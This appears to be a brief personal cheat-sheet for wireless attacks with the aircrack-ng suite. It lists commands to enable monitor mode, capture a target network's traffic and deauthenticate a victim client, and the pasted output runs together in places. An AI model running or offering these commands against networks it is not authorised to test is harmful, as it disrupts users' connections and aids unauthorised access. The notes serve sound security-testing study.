Airgeddon
AirCrack¶
Setup wireless Interfaces:
airmon-ng check
airmon-ng check kill
airmon-ng start wlan0mon 3Interface Chipset Driver wlan0 carl9170 - [phy0]
(monitor mode enabled on wlan0mon)
Dump Wifi Capture to file:
#airodump-ng -c <channel> --bssid <BSSID> -w wep1capture wlan0mon
airodump-ng -c 3 --bssid 34:08:04:09:3D:38 -w wep1 mon0
Dauth Attack:
#aireplay-ng -0 -a <BSSID> -c <Victim> wlan0mon
aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
You can tell that it is working when the Client in the airodump-ng window has 0 power.